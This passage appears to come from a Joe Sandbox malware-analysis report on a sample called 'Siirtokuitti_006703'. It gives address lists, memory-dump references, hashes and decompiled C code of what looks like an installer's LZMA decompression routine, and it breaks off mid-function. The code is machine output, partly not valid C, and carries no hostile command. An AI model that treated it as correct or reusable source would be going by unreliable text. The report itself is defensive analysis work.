                                                                                                                      0x00406c0c
                                                                                                                      0x00406c10
                                                                                                                      0x004072d0
                                                                                                                      0x00000000
                                                                                                                      0x004072d0
                                                                                                                      0x00406c16
                                                                                                                      0x00406c19
                                                                                                                      0x00406c1c
                                                                                                                      0x00406c20
                                                                                                                      0x00406c23
                                                                                                                      0x00406c29
                                                                                                                      0x00406c2b
                                                                                                                      0x00406c2b
                                                                                                                      0x00406c2b
                                                                                                                      0x00406c2e
                                                                                                                      0x00406c31
                                                                                                                      0x00406c31
                                                                                                                      0x00406c31
                                                                                                                      0x00406c37
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406c39
                                                                                                                      0x00406c3c
                                                                                                                      0x00406c3f
                                                                                                                      0x00406c42
                                                                                                                      0x00406c45
                                                                                                                      0x00406c48
                                                                                                                      0x00406c4b
                                                                                                                      0x00406c4e
                                                                                                                      0x00406c51
                                                                                                                      0x00406c54
                                                                                                                      0x00406c57
                                                                                                                      0x00406c6f
                                                                                                                      0x00406c72
                                                                                                                      0x00406c75
                                                                                                                      0x00406c78
                                                                                                                      0x00406c7b
                                                                                                                      0x00406c7f
                                                                                                                      0x00406c81
                                                                                                                      0x00406c59
                                                                                                                      0x00406c59
                                                                                                                      0x00406c61
                                                                                                                      0x00406c66
                                                                                                                      0x00406c68
                                                                                                                      0x00406c6a
                                                                                                                      0x00406c6a
                                                                                                                      0x00406c84
                                                                                                                      0x00406c8b
                                                                                                                      0x00406c8e
                                                                                                                      0x00000000
                                                                                                                      0x00406c90
                                                                                                                      0x00000000
                                                                                                                      0x00406c90
                                                                                                                      0x00406c8e
                                                                                                                      0x00406c95
                                                                                                                      0x00406c95
                                                                                                                      0x00406c95
                                                                                                                      0x00406c95
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406cd0
                                                                                                                      0x00406cd0
                                                                                                                      0x00406cd4
                                                                                                                      0x004072dc
                                                                                                                      0x00000000
                                                                                                                      0x004072dc
                                                                                                                      0x00406cda
                                                                                                                      0x00406cdd
                                                                                                                      0x00406ce0
                                                                                                                      0x00406ce4
                                                                                                                      0x00406ce7
                                                                                                                      0x00406ced
                                                                                                                      0x00406cef
                                                                                                                      0x00406cef
                                                                                                                      0x00406cef
                                                                                                                      0x00406cf2
                                                                                                                      0x00406cf5
                                                                                                                      0x00406cf5
                                                                                                                      0x00406cfb
                                                                                                                      0x00406c99
                                                                                                                      0x00406c99
                                                                                                                      0x00406c9c
                                                                                                                      0x00000000
                                                                                                                      0x00406c9c
                                                                                                                      0x00406cfd
                                                                                                                      0x00406cfd
                                                                                                                      0x00406d00
                                                                                                                      0x00406d03
                                                                                                                      0x00406d06
                                                                                                                      0x00406d09
                                                                                                                      0x00406d0c
                                                                                                                      0x00406d0f
                                                                                                                      0x00406d12
                                                                                                                      0x00406d15
                                                                                                                      0x00406d18
                                                                                                                      0x00406d1b
                                                                                                                      0x00406d33
                                                                                                                      0x00406d36
                                                                                                                      0x00406d39
                                                                                                                      0x00406d3c
                                                                                                                      0x00406d3f
                                                                                                                      0x00406d43
                                                                                                                      0x00406d45
                                                                                                                      0x00406d1d
                                                                                                                      0x00406d1d
                                                                                                                      0x00406d25
                                                                                                                      0x00406d2a
                                                                                                                      0x00406d2c
                                                                                                                      0x00406d2e
                                                                                                                      0x00406d2e
                                                                                                                      0x00406d48
                                                                                                                      0x00406d4f
                                                                                                                      0x00406d52
                                                                                                                      0x00000000
                                                                                                                      0x00406d54
                                                                                                                      0x00000000
                                                                                                                      0x00406d54
                                                                                                                      0x00000000
                                                                                                                      0x00406fe1
                                                                                                                      0x00406fe1
                                                                                                                      0x00406fe5
                                                                                                                      0x0040730c
                                                                                                                      0x00000000
                                                                                                                      0x0040730c
                                                                                                                      0x00406feb
                                                                                                                      0x00406fee
                                                                                                                      0x00406ff1
                                                                                                                      0x00406ff5
                                                                                                                      0x00406ff8
                                                                                                                      0x00406ffe
                                                                                                                      0x00407000
                                                                                                                      0x00407000
                                                                                                                      0x00407000
                                                                                                                      0x00407003
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406db1
                                                                                                                      0x00406db1
                                                                                                                      0x00406db4
                                                                                                                      0x00407126
                                                                                                                      0x00407126
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004071ad
                                                                                                                      0x004071b1
                                                                                                                      0x004071cf
                                                                                                                      0x004071cf
                                                                                                                      0x004071cf
                                                                                                                      0x004071d6
                                                                                                                      0x004071dd
                                                                                                                      0x00000000
                                                                                                                      0x004071dd
                                                                                                                      0x004071b3
                                                                                                                      0x004071b6
                                                                                                                      0x004071b9
                                                                                                                      0x004071bc
                                                                                                                      0x004071c3
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0040729e
                                                                                                                      0x004072a1
                                                                                                                      0x004071a2
                                                                                                                      0x004071a2
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406ed8
                                                                                                                      0x00406eda
                                                                                                                      0x00406ee1
                                                                                                                      0x00406ee2
                                                                                                                      0x00406ee4
                                                                                                                      0x00406ee7
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406eef
                                                                                                                      0x00406ef2
                                                                                                                      0x00406ef5
                                                                                                                      0x00406ef7
                                                                                                                      0x00406ef9
                                                                                                                      0x00406ef9
                                                                                                                      0x00406efa
                                                                                                                      0x00406efd
                                                                                                                      0x00406f04
                                                                                                                      0x00406f07
                                                                                                                      0x00406f15
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004071fa
                                                                                                                      0x004071fa
                                                                                                                      0x004071fe
                                                                                                                      0x00407336
                                                                                                                      0x00000000
                                                                                                                      0x00407336
                                                                                                                      0x00407204
                                                                                                                      0x00407207
                                                                                                                      0x0040720a
                                                                                                                      0x0040720e
                                                                                                                      0x00407211
                                                                                                                      0x00407217
                                                                                                                      0x00407219
                                                                                                                      0x00407219
                                                                                                                      0x00407219
                                                                                                                      0x0040721c
                                                                                                                      0x0040721f
                                                                                                                      0x0040721f
                                                                                                                      0x0040721f
                                                                                                                      0x0040721f
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406f1d
                                                                                                                      0x00406f20
                                                                                                                      0x00406f56
                                                                                                                      0x00407086
                                                                                                                      0x00407086
                                                                                                                      0x00407086
                                                                                                                      0x00407086
                                                                                                                      0x00407089
                                                                                                                      0x00407089
                                                                                                                      0x0040708c
                                                                                                                      0x0040708e
                                                                                                                      0x00407318
                                                                                                                      0x00000000
                                                                                                                      0x00407318
                                                                                                                      0x00407094
                                                                                                                      0x00407097
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0040709d
                                                                                                                      0x004070a1
                                                                                                                      0x004070a4
                                                                                                                      0x004070a4
                                                                                                                      0x004070a4
                                                                                                                      0x00000000
                                                                                                                      0x004070a4
                                                                                                                      0x00406f22
                                                                                                                      0x00406f24
                                                                                                                      0x00406f26
                                                                                                                      0x00406f28
                                                                                                                      0x00406f2b
                                                                                                                      0x00406f2c
                                                                                                                      0x00406f2e
                                                                                                                      0x00406f30
                                                                                                                      0x00406f33
                                                                                                                      0x00406f36
                                                                                                                      0x00406f4c
                                                                                                                      0x00406f51
                                                                                                                      0x00406f89
                                                                                                                      0x00406f89
                                                                                                                      0x00406f8d
                                                                                                                      0x00406fb9
                                                                                                                      0x00406fbb
                                                                                                                      0x00406fc2
                                                                                                                      0x00406fc5
                                                                                                                      0x00406fc8
                                                                                                                      0x00406fc8
                                                                                                                      0x00406fcd
                                                                                                                      0x00406fcd
                                                                                                                      0x00406fcf
                                                                                                                      0x00406fd2
                                                                                                                      0x00406fd9
                                                                                                                      0x00406fdc
                                                                                                                      0x00407009
                                                                                                                      0x00407009
                                                                                                                      0x0040700c
                                                                                                                      0x0040700f
                                                                                                                      0x00407083
                                                                                                                      0x00407083
                                                                                                                      0x00407083
                                                                                                                      0x00000000
                                                                                                                      0x00407083
                                                                                                                      0x00407011
                                                                                                                      0x00407017
                                                                                                                      0x0040701a
                                                                                                                      0x0040701d
                                                                                                                      0x00407020
                                                                                                                      0x00407023
                                                                                                                      0x00407026
                                                                                                                      0x00407029
                                                                                                                      0x0040702c
                                                                                                                      0x0040702f
                                                                                                                      0x00407032
                                                                                                                      0x0040704b
                                                                                                                      0x0040704d
                                                                                                                      0x00407050
                                                                                                                      0x00407051
                                                                                                                      0x00407054
                                                                                                                      0x00407056
                                                                                                                      0x00407059
                                                                                                                      0x0040705b
                                                                                                                      0x0040705d
                                                                                                                      0x00407060
                                                                                                                      0x00407062
                                                                                                                      0x00407065
                                                                                                                      0x00407069
                                                                                                                      0x0040706b
                                                                                                                      0x0040706b
                                                                                                                      0x0040706c
                                                                                                                      0x0040706f
                                                                                                                      0x00407072
                                                                                                                      0x00407034
                                                                                                                      0x00407034
                                                                                                                      0x0040703c
                                                                                                                      0x00407041
                                                                                                                      0x00407043
                                                                                                                      0x00407046
                                                                                                                      0x00407046
                                                                                                                      0x00407075
                                                                                                                      0x0040707c
                                                                                                                      0x00407006
                                                                                                                      0x00407006
                                                                                                                      0x00407006
                                                                                                                      0x00407006
                                                                                                                      0x00000000
                                                                                                                      0x0040707e
                                                                                                                      0x00000000
                                                                                                                      0x0040707e
                                                                                                                      0x0040707c
                                                                                                                      0x00406f8f
                                                                                                                      0x00406f92
                                                                                                                      0x00406f94
                                                                                                                      0x00406f97
                                                                                                                      0x00406f9a
                                                                                                                      0x00406f9d
                                                                                                                      0x00406f9f
                                                                                                                      0x00406fa2
                                                                                                                      0x00406fa5
                                                                                                                      0x00406fa5
                                                                                                                      0x00406fa8
                                                                                                                      0x00406fa8
                                                                                                                      0x00406fab
                                                                                                                      0x00406fb2
                                                                                                                      0x00406f86
                                                                                                                      0x00406f86
                                                                                                                      0x00406f86
                                                                                                                      0x00406f86
                                                                                                                      0x00000000
                                                                                                                      0x00406fb4
                                                                                                                      0x00000000
                                                                                                                      0x00406fb4
                                                                                                                      0x00406fb2
                                                                                                                      0x00406f38
                                                                                                                      0x00406f3b
                                                                                                                      0x00406f3d
                                                                                                                      0x00406f40
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406c9f
                                                                                                                      0x00406c9f
                                                                                                                      0x00406ca3
                                                                                                                      0x004072e8
                                                                                                                      0x00000000
                                                                                                                      0x004072e8
                                                                                                                      0x00406ca9
                                                                                                                      0x00406cac
                                                                                                                      0x00406caf
                                                                                                                      0x00406cb2
                                                                                                                      0x00406cb5
                                                                                                                      0x00406cb8
                                                                                                                      0x00406cbb
                                                                                                                      0x00406cbd
                                                                                                                      0x00406cc0
                                                                                                                      0x00406cc3
                                                                                                                      0x00406cc6
                                                                                                                      0x00406cc8
                                                                                                                      0x00406cc8
                                                                                                                      0x00406cc8
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406e2a
                                                                                                                      0x00406e2a
                                                                                                                      0x00406e2e
                                                                                                                      0x004072f4
                                                                                                                      0x00000000
                                                                                                                      0x004072f4
                                                                                                                      0x00406e34
                                                                                                                      0x00406e37
                                                                                                                      0x00406e3a
                                                                                                                      0x00406e3d
                                                                                                                      0x00406e3f
                                                                                                                      0x00406e3f
                                                                                                                      0x00406e3f
                                                                                                                      0x00406e42
                                                                                                                      0x00406e45
                                                                                                                      0x00406e48
                                                                                                                      0x00406e4b
                                                                                                                      0x00406e4e
                                                                                                                      0x00406e51
                                                                                                                      0x00406e52
                                                                                                                      0x00406e54
                                                                                                                      0x00406e54
                                                                                                                      0x00406e54
                                                                                                                      0x00406e57
                                                                                                                      0x00406e5a
                                                                                                                      0x00406e5d
                                                                                                                      0x00406e60
                                                                                                                      0x00406e60
                                                                                                                      0x00406e60
                                                                                                                      0x00406e63
                                                                                                                      0x00406e65
                                                                                                                      0x00406e65
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004070a7
                                                                                                                      0x004070a7
                                                                                                                      0x004070a7
                                                                                                                      0x004070ab
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004070b1
                                                                                                                      0x004070b4
                                                                                                                      0x004070b7
                                                                                                                      0x004070ba
                                                                                                                      0x004070bc
                                                                                                                      0x004070bc
                                                                                                                      0x004070bc
                                                                                                                      0x004070bf
                                                                                                                      0x004070c2
                                                                                                                      0x004070c5
                                                                                                                      0x004070c8
                                                                                                                      0x004070cb
                                                                                                                      0x004070ce
                                                                                                                      0x004070cf
                                                                                                                      0x004070d1
                                                                                                                      0x004070d1
                                                                                                                      0x004070d1
                                                                                                                      0x004070d4
                                                                                                                      0x004070d7
                                                                                                                      0x004070da
                                                                                                                      0x004070dd
                                                                                                                      0x004070e0
                                                                                                                      0x004070e4
                                                                                                                      0x004070e6
                                                                                                                      0x004070e9
                                                                                                                      0x00000000
                                                                                                                      0x004070eb
                                                                                                                      0x00406e68
                                                                                                                      0x00406e68
                                                                                                                      0x00000000
                                                                                                                      0x00406e68
                                                                                                                      0x004070e9
                                                                                                                      0x0040731e
                                                                                                                      0x00407340
                                                                                                                      0x00407346
                                                                                                                      0x00407348
                                                                                                                      0x0040734f
                                                                                                                      0x00407351
                                                                                                                      0x00407358
                                                                                                                      0x0040735c
                                                                                                                      0x00000000
                                                                                                                      0x0040694d
                                                                                                                      0x00407355
                                                                                                                      0x00407355
                                                                                                                      0x00000000
                                                                                                                      0x00407355
                                                                                                                      0x004071a2
                                                                                                                      0x00407228
                                                                                                                      0x0040722e
                                                                                                                      0x00407231
                                                                                                                      0x00407234
                                                                                                                      0x00407237
                                                                                                                      0x0040723a
                                                                                                                      0x0040723d
                                                                                                                      0x00407240
                                                                                                                      0x00407243
                                                                                                                      0x00407249
                                                                                                                      0x00407262
                                                                                                                      0x00407265
                                                                                                                      0x00407268
                                                                                                                      0x0040726b
                                                                                                                      0x0040726f
                                                                                                                      0x00407271
                                                                                                                      0x00407272
                                                                                                                      0x00407275
                                                                                                                      0x0040724b
                                                                                                                      0x0040724b
                                                                                                                      0x00407253
                                                                                                                      0x00407258
                                                                                                                      0x0040725a
                                                                                                                      0x0040725d
                                                                                                                      0x0040725d
                                                                                                                      0x0040727f
                                                                                                                      0x00000000
                                                                                                                      0x00407281
                                                                                                                      0x00000000
                                                                                                                      0x00407281
                                                                                                                      0x0040727f
                                                                                                                      0x00000000
                                                                                                                      0x004070f4

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: f289ec4eae441b973c5cf469eb2209b78d92787f90c2f70d8ea77383fdb072af
                                                                                                                      • Instruction ID: 81ced8d75bd8cd674d530aa485ef516b0f39a629971cfce93107e9c84bdcedbb
                                                                                                                      • Opcode Fuzzy Hash: f289ec4eae441b973c5cf469eb2209b78d92787f90c2f70d8ea77383fdb072af
                                                                                                                      • Instruction Fuzzy Hash: 4E912170E04228CBDF28CFA8C8547ADBBB1FB44305F14816ED856BB281D778A986DF45
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 98%
                                                                                                                      			E00406E06() {
                                                                                                                      				unsigned short _t532;
                                                                                                                      				signed int _t533;
                                                                                                                      				void _t534;
                                                                                                                      				void* _t535;
                                                                                                                      				signed int _t536;
                                                                                                                      				signed int _t565;
                                                                                                                      				signed int _t568;
                                                                                                                      				signed int _t589;
                                                                                                                      				signed int* _t606;
                                                                                                                      				void* _t613;
                                                                                                                      
                                                                                                                      				L0:
                                                                                                                      				while(1) {
                                                                                                                      					L0:
                                                                                                                      					if( *(_t613 - 0x40) != 0) {
                                                                                                                      						L89:
                                                                                                                      						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
                                                                                                                      						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
                                                                                                                      						L69:
                                                                                                                      						_t606 =  *(_t613 - 0x58);
                                                                                                                      						 *(_t613 - 0x84) = 0x12;
                                                                                                                      						L132:
                                                                                                                      						 *(_t613 - 0x54) = _t606;
                                                                                                                      						L133:
                                                                                                                      						_t532 =  *_t606;
                                                                                                                      						_t589 = _t532 & 0x0000ffff;
                                                                                                                      						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                                                      						if( *(_t613 - 0xc) >= _t565) {
                                                                                                                      							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                                                      							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                                                      							 *(_t613 - 0x40) = 1;
                                                                                                                      							_t533 = _t532 - (_t532 >> 5);
                                                                                                                      							 *_t606 = _t533;
                                                                                                                      						} else {
                                                                                                                      							 *(_t613 - 0x10) = _t565;
                                                                                                                      							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                      							 *_t606 = (0x800 - _t589 >> 5) + _t532;
                                                                                                                      						}
                                                                                                                      						if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                                                      							L139:
                                                                                                                      							_t534 =  *(_t613 - 0x84);
                                                                                                                      							L140:
                                                                                                                      							 *(_t613 - 0x88) = _t534;
                                                                                                                      							goto L1;
                                                                                                                      						} else {
                                                                                                                      							L137:
                                                                                                                      							if( *(_t613 - 0x6c) == 0) {
                                                                                                                      								 *(_t613 - 0x88) = 5;
                                                                                                                      								goto L170;
                                                                                                                      							}
                                                                                                                      							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                                                                      							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                      							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                      							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                      							goto L139;
                                                                                                                      						}
                                                                                                                      					} else {
                                                                                                                      						if( *(__ebp - 0x60) == 0) {
                                                                                                                      							L171:
                                                                                                                      							_t536 = _t535 | 0xffffffff;
                                                                                                                      							L172:
                                                                                                                      							return _t536;
                                                                                                                      						}
                                                                                                                      						__eax = 0;
                                                                                                                      						_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                      						0 | _t258 = _t258 + _t258 + 9;
                                                                                                                      						 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                                                      						L75:
                                                                                                                      						if( *(__ebp - 0x64) == 0) {
                                                                                                                      							 *(__ebp - 0x88) = 0x1b;
                                                                                                                      							L170:
                                                                                                                      							_t568 = 0x22;
                                                                                                                      							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                                                                      							_t536 = 0;
                                                                                                                      							goto L172;
                                                                                                                      						}
                                                                                                                      						__eax =  *(__ebp - 0x14);
                                                                                                                      						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                      						if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                      							__eax = __eax +  *(__ebp - 0x74);
                                                                                                                      						}
                                                                                                                      						__edx =  *(__ebp - 8);
                                                                                                                      						__cl =  *(__eax + __edx);
                                                                                                                      						__eax =  *(__ebp - 0x14);
                                                                                                                      						 *(__ebp - 0x5c) = __cl;
                                                                                                                      						 *(__eax + __edx) = __cl;
                                                                                                                      						__eax = __eax + 1;
                                                                                                                      						__edx = 0;
                                                                                                                      						_t274 = __eax %  *(__ebp - 0x74);
                                                                                                                      						__eax = __eax /  *(__ebp - 0x74);
                                                                                                                      						__edx = _t274;
                                                                                                                      						__eax =  *(__ebp - 0x68);
                                                                                                                      						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                      						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                      						_t283 = __ebp - 0x64;
                                                                                                                      						 *_t283 =  *(__ebp - 0x64) - 1;
                                                                                                                      						 *( *(__ebp - 0x68)) = __cl;
                                                                                                                      						L79:
                                                                                                                      						 *(__ebp - 0x14) = __edx;
                                                                                                                      						L80:
                                                                                                                      						 *(__ebp - 0x88) = 2;
                                                                                                                      					}
                                                                                                                      					L1:
                                                                                                                      					_t535 =  *(_t613 - 0x88);
                                                                                                                      					if(_t535 > 0x1c) {
                                                                                                                      						goto L171;
                                                                                                                      					}
                                                                                                                      					switch( *((intOrPtr*)(_t535 * 4 +  &M0040735D))) {
                                                                                                                      						case 0:
                                                                                                                      							if( *(_t613 - 0x6c) == 0) {
                                                                                                                      								goto L170;
                                                                                                                      							}
                                                                                                                      							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                      							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                      							_t535 =  *( *(_t613 - 0x70));
                                                                                                                      							if(_t535 > 0xe1) {
                                                                                                                      								goto L171;
                                                                                                                      							}
                                                                                                                      							_t539 = _t535 & 0x000000ff;
                                                                                                                      							_push(0x2d);
                                                                                                                      							asm("cdq");
                                                                                                                      							_pop(_t570);
                                                                                                                      							_push(9);
                                                                                                                      							_pop(_t571);
                                                                                                                      							_t609 = _t539 / _t570;
                                                                                                                      							_t541 = _t539 % _t570 & 0x000000ff;
                                                                                                                      							asm("cdq");
                                                                                                                      							_t604 = _t541 % _t571 & 0x000000ff;
                                                                                                                      							 *(_t613 - 0x3c) = _t604;
                                                                                                                      							 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                                                                      							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
                                                                                                                      							_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                                                                      							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                                                                      								L10:
                                                                                                                      								if(_t612 == 0) {
                                                                                                                      									L12:
                                                                                                                      									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                                                                      									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                      									goto L15;
                                                                                                                      								} else {
                                                                                                                      									goto L11;
                                                                                                                      								}
                                                                                                                      								do {
                                                                                                                      									L11:
                                                                                                                      									_t612 = _t612 - 1;
                                                                                                                      									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                                                                      								} while (_t612 != 0);
                                                                                                                      								goto L12;
                                                                                                                      							}
                                                                                                                      							if( *(_t613 - 4) != 0) {
                                                                                                                      								GlobalFree( *(_t613 - 4));
                                                                                                                      							}
                                                                                                                      							_t535 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                      							 *(_t613 - 4) = _t535;
                                                                                                                      							if(_t535 == 0) {
                                                                                                                      								goto L171;
                                                                                                                      							} else {
                                                                                                                      								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                                                                      								goto L10;
                                                                                                                      							}
                                                                                                                      						case 1:
                                                                                                                      							L13:
                                                                                                                      							__eflags =  *(_t613 - 0x6c);
                                                                                                                      							if( *(_t613 - 0x6c) == 0) {
                                                                                                                      								 *(_t613 - 0x88) = 1;
                                                                                                                      								goto L170;
                                                                                                                      							}
                                                                                                                      							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                      							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                                                                      							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                      							_t45 = _t613 - 0x48;
                                                                                                                      							 *_t45 =  *(_t613 - 0x48) + 1;
                                                                                                                      							__eflags =  *_t45;
                                                                                                                      							L15:
                                                                                                                      							if( *(_t613 - 0x48) < 4) {
                                                                                                                      								goto L13;
                                                                                                                      							}
                                                                                                                      							_t547 =  *(_t613 - 0x40);
                                                                                                                      							if(_t547 ==  *(_t613 - 0x74)) {
                                                                                                                      								L20:
                                                                                                                      								 *(_t613 - 0x48) = 5;
                                                                                                                      								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                                                                      								goto L23;
                                                                                                                      							}
                                                                                                                      							 *(_t613 - 0x74) = _t547;
                                                                                                                      							if( *(_t613 - 8) != 0) {
                                                                                                                      								GlobalFree( *(_t613 - 8));
                                                                                                                      							}
                                                                                                                      							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                                                                      							 *(_t613 - 8) = _t535;
                                                                                                                      							if(_t535 == 0) {
                                                                                                                      								goto L171;
                                                                                                                      							} else {
                                                                                                                      								goto L20;
                                                                                                                      							}
                                                                                                                      						case 2:
                                                                                                                      							L24:
                                                                                                                      							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                                                                      							 *(_t613 - 0x84) = 6;
                                                                                                                      							 *(_t613 - 0x4c) = _t554;
                                                                                                                      							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
                                                                                                                      							goto L132;
                                                                                                                      						case 3:
                                                                                                                      							L21:
                                                                                                                      							__eflags =  *(_t613 - 0x6c);
                                                                                                                      							if( *(_t613 - 0x6c) == 0) {
                                                                                                                      								 *(_t613 - 0x88) = 3;
                                                                                                                      								goto L170;
                                                                                                                      							}
                                                                                                                      							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                      							_t67 = _t613 - 0x70;
                                                                                                                      							 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                                                                      							__eflags =  *_t67;
                                                                                                                      							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                      							L23:
                                                                                                                      							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                                                                      							if( *(_t613 - 0x48) != 0) {
                                                                                                                      								goto L21;
                                                                                                                      							}
                                                                                                                      							goto L24;
                                                                                                                      						case 4:
                                                                                                                      							goto L133;
                                                                                                                      						case 5:
                                                                                                                      							goto L137;
                                                                                                                      						case 6:
                                                                                                                      							__edx = 0;
                                                                                                                      							__eflags =  *(__ebp - 0x40);
                                                                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                                                                      								__eax =  *(__ebp - 4);
                                                                                                                      								__ecx =  *(__ebp - 0x38);
                                                                                                                      								 *(__ebp - 0x34) = 1;
                                                                                                                      								 *(__ebp - 0x84) = 7;
                                                                                                                      								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                      								goto L132;
                                                                                                                      							}
                                                                                                                      							__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                      							__esi =  *(__ebp - 0x60);
                                                                                                                      							__cl = 8;
                                                                                                                      							__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                      							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                      							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                      							__ecx =  *(__ebp - 0x3c);
                                                                                                                      							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                      							__ecx =  *(__ebp - 4);
                                                                                                                      							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                      							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
